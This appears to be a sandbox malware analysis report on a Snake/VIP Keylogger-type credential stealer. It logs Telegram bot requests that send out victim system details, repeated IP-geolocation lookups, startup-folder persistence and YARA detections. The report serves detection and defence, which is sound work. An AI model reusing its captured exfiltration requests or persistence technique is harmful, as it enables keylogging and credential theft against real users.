    Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              8192.168.2.649807104.21.32.14431672C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:19:28 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              2025-01-10 22:19:28 UTC853INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:28 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1862357
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P%2B40wsaCa3eaFqbkJYiMVp26MoVP%2BVrMu653rlBbMv8pEZbANcTyrQLouCIdyPYGuz4w3GdczWtvdqDW2OJwFp5EVdbAfvb3woyVM6krdpYCpFjX1VzhECCOc6CHasGc3uYENhOT"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 90000c7ccdbb1875-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1639&min_rtt=1636&rtt_var=620&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1756919&cwnd=153&unsent_bytes=0&cid=7dc4037edcb69a1b&ts=154&x=0"
2025-01-10 22:19:28 UTC  362                IN         Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
9           192.168.2.6  49811        149.154.167.220  443               1672  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-10 22:19:28 UTC  349                OUT        GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:53:48%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
2025-01-10 22:19:29 UTC  344                IN         HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Date: Fri, 10 Jan 2025 22:19:29 GMT
    Content-Type: application/json
    Content-Length: 55
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:19:29 UTC  55                 IN         Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
10          192.168.2.6  49833        104.21.32.1      443               7076  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-10 22:19:32 UTC  85                 OUT        GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-10 22:19:32 UTC  850                IN         HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:19:32 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1862361
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jshIUSC4iTuP8e1PIhG8DuD5Cgs2ECumB%2BdJL6F6pSViL66xoIeDM1tDg2byUHg7fzvPNC9KVUq6Gq7VY8SaMe3qlerg5mMtuLZXVEllwpZXWmKff4Qm4nuFCPsGRQN6tTEXg6nH"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90000c9909924344-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1599&rtt_var=602&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1813664&cwnd=47&unsent_bytes=0&cid=656e05cccf11a143&ts=177&x=0"
2025-01-10 22:19:32 UTC  362                IN         Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
11          192.168.2.6  49841        104.21.32.1      443               7076  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-10 22:19:33 UTC  61                 OUT        GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2025-01-10 22:19:33 UTC  856                IN         HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:19:33 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1862362
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zmb18uB%2FRT6C58Pm1GXnAIddSkxnlOlj5y3uQcdovZEaOCCD6y%2Fj0Uvpi3ue8mVv3S8gWtgTybqm5z5tIwRPaE0SAIJiumTx%2BBLMT82VU9yweFHmoNSfzIc1okr0xYZ5dWPZp7Xs"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90000c9e9f39c327-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=5089&min_rtt=1602&rtt_var=2831&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1822721&cwnd=189&unsent_bytes=0&cid=cdfaa9e31b455641&ts=158&x=0"
2025-01-10 22:19:33 UTC  362                IN         Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
12          192.168.2.6  49851        104.21.32.1      443               7076  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-10 22:19:34 UTC  61                 OUT        GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2025-01-10 22:19:34 UTC  855                IN         HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:19:34 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1862363
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FX6G1e6JCBqYDyPIhPREKfyvCJFB5TqshreYx3ZrMzvfISHCqn8Y8oudq%2Bv9riP6TD99hcWVUxBpfqwXht2FLtlQPLOAZkSCIYa7iOebXhW8HDZ%2FnOUBvlFw7EdIM1s%2BsjcdPJbw"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90000ca6dfc91875-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1629&min_rtt=1620&rtt_var=625&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1725768&cwnd=153&unsent_bytes=0&cid=b913ee259f542c6a&ts=148&x=0"
2025-01-10 22:19:34 UTC  362                IN         Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
13          192.168.2.6  49862        104.21.32.1      443               7076  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-10 22:19:36 UTC  85                 OUT        GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-10 22:19:36 UTC  865                IN         HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:19:36 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1862365
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eEj8Va%2B6H6TN4gmIa%2FYwcRxL3nmNx%2BgPz2XW%2Fm45awpKoSOAdhDubF0X0XkQn0%2FJCghh92h2faAHuxyRL%2FEpvnN84URzA1o5Nxx166y5Czedh%2FrEeK07vBqhObNn%2FY1j5r55Z9wy"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90000caf183f8cda-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1750&min_rtt=1742&rtt_var=670&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1611479&cwnd=243&unsent_bytes=0&cid=89182e00b7e36b2f&ts=166&x=0"
2025-01-10 22:19:36 UTC  362                IN         Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
14          192.168.2.6  49872        104.21.32.1      443               7076  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-10 22:19:37 UTC  85                 OUT        GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-10 22:19:37 UTC  867                IN         HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:19:37 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1862366
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lEWMD1LW%2B5y9wbvkvVg%2F%2F01awqo6%2FZJiZBuLXladlOJMeccQBL%2FVQr%2BOhSh2bCD%2Ft7lQEacEHVqEWxqMEVAVtT0vLjm2t0s8ZYEWVJoiNhhPoCb9%2B36rJQEdR%2FtEvVascFoTWXPE"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90000cb76df141a6-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1563&rtt_var=602&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1793611&cwnd=241&unsent_bytes=0&cid=7147d0e6b1e1a2c3&ts=150&x=0"
2025-01-10 22:19:37 UTC  362                IN         Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
15          192.168.2.6  49882        104.21.32.1      443               7076  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-10 22:19:38 UTC  85                 OUT        GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-10 22:19:38 UTC  852                IN         HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:19:38 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1862367
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KW5BXpBu5xJnyemn0VK5f54qWaBCi24toySOiWodA3%2Fvt1qzThO5isd4lXgOZntgDithSIIQrd6Xd%2FwuQcjKqz2UxZM8n6UrJ6lWMswQnYtrzswBAfnrnlryMX0WmnFhEDDeRQeg"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90000cbfaaa74344-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1853&min_rtt=1787&rtt_var=717&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1634023&cwnd=47&unsent_bytes=0&cid=2ec29d9da78b2a1d&ts=161&x=0"
2025-01-10 22:19:38 UTC  362                IN         Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 16
Source IP: 192.168.2.6
Source Port: 49893
Destination IP: 104.21.32.1
Destination Port: 443
PID: 7076
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp: 2025-01-10 22:19:40 UTC, Bytes transferred: 61, Direction: OUT
GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Timestamp: 2025-01-10 22:19:40 UTC, Bytes transferred: 857, Direction: IN
HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:19:40 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1862369
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k7BWCIhdHuBRubAI4qUkWojsWQD6vih4MBQ3I5NF0H53%2FXKXtQAMVgQys%2FnxWD82DM9aVTSP8Vvo0h9uf5C%2BViAeSpP79fy7M7ryMoW%2FEiSjAGTjetx1IUrcB0U5ME3xM1xajm4T"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90000cc7d93cc327-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1630&min_rtt=1612&rtt_var=640&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1662870&cwnd=189&unsent_bytes=0&cid=9ac869e44c01f51e&ts=155&x=0"
Timestamp: 2025-01-10 22:19:40 UTC, Bytes transferred: 362, Direction: IN
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 17
Source IP: 192.168.2.6
Source Port: 61851
Destination IP: 104.21.32.1
Destination Port: 443
PID: 7076
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp: 2025-01-10 22:19:41 UTC, Bytes transferred: 85, Direction: OUT
GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
Timestamp: 2025-01-10 22:19:41 UTC, Bytes transferred: 857, Direction: IN
HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:19:41 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1862370
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nlecSpibg3dAYIywmUdQjNAPcf54cWkanGf%2BLVCzmakSc2k58BL0MxeXbMMv5xXrWaBCI82DtYftAKtnKy6apT1MaWs4IF%2FaQcWEUahw3n0x725ZCpS3d%2FEKB5Exd1%2BMam4VS6TX"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90000cd00cbe8cda-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1763&min_rtt=1760&rtt_var=666&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1636771&cwnd=243&unsent_bytes=0&cid=15ad3f2c6600ddba&ts=143&x=0"
Timestamp: 2025-01-10 22:19:41 UTC, Bytes transferred: 362, Direction: IN
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 18
Source IP: 192.168.2.6
Source Port: 61863
Destination IP: 104.21.32.1
Destination Port: 443
PID: 7076
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp: 2025-01-10 22:19:42 UTC, Bytes transferred: 85, Direction: OUT
GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
Timestamp: 2025-01-10 22:19:42 UTC, Bytes transferred: 850, Direction: IN
HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:19:42 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1862371
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CStzoQuGH9lxLsxz2wkpFuxDCi5OewBW0GY8sSsnignkynw03vUNDNhtOk%2BI1zRpNcvw5FVlY6CJp2aGUzoSC34YrCz9YGIMDw4QyR6Jz8XrGavFXBvT4JTYKrVXa7aYK8ln1LFF"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90000cd82ddd4344-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1673&min_rtt=1658&rtt_var=633&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1761158&cwnd=47&unsent_bytes=0&cid=f6986e5575da47bd&ts=141&x=0"
Timestamp: 2025-01-10 22:19:42 UTC, Bytes transferred: 362, Direction: IN
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 19
Source IP: 192.168.2.6
Source Port: 61868
Destination IP: 149.154.167.220
Destination Port: 443
PID: 7076
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp: 2025-01-10 22:19:43 UTC, Bytes transferred: 349, Direction: OUT
GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2011/01/2025%20/%2004:44:45%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
Timestamp: 2025-01-10 22:19:43 UTC, Bytes transferred: 344, Direction: IN
HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:19:43 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Timestamp: 2025-01-10 22:19:43 UTC, Bytes transferred: 55, Direction: IN
Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}



                                                                                                              Target ID:0
                                                                                                              Start time:17:19:06
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\Desktop\6cicUo3f8g.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\6cicUo3f8g.exe"
                                                                                                              Imagebase:0x8e0000
                                                                                                              File size:1'033'728 bytes
                                                                                                              MD5 hash:D721EAB396039744DF30C1C4AC89386E
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:2
                                                                                                              Start time:17:19:10
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\AppData\Local\Thebesian\toggeries.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\6cicUo3f8g.exe"
                                                                                                              Imagebase:0xae0000
                                                                                                              File size:1'033'728 bytes
                                                                                                              MD5 hash:D721EAB396039744DF30C1C4AC89386E
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              • Detection: 83%, ReversingLabs
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:3
                                                                                                              Start time:17:19:14
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\6cicUo3f8g.exe"
                                                                                                              Imagebase:0xaa0000
                                                                                                              File size:45'984 bytes
                                                                                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4584887740.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:6
                                                                                                              Start time:17:19:25
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\toggeries.vbs"
                                                                                                              Imagebase:0x7ff61b840000
                                                                                                              File size:170'496 bytes
                                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

Target ID:7
Start time:17:19:25
Start date:10/01/2025
Path:C:\Users\user\AppData\Local\Thebesian\toggeries.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Thebesian\toggeries.exe"
Imagebase:0xae0000
File size:1'033'728 bytes
MD5 hash:D721EAB396039744DF30C1C4AC89386E
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
• Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:low
Has exited:true

Target ID:8
Start time:17:19:29
Start date:10/01/2025
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Thebesian\toggeries.exe"
Imagebase:0x240000
File size:45'984 bytes
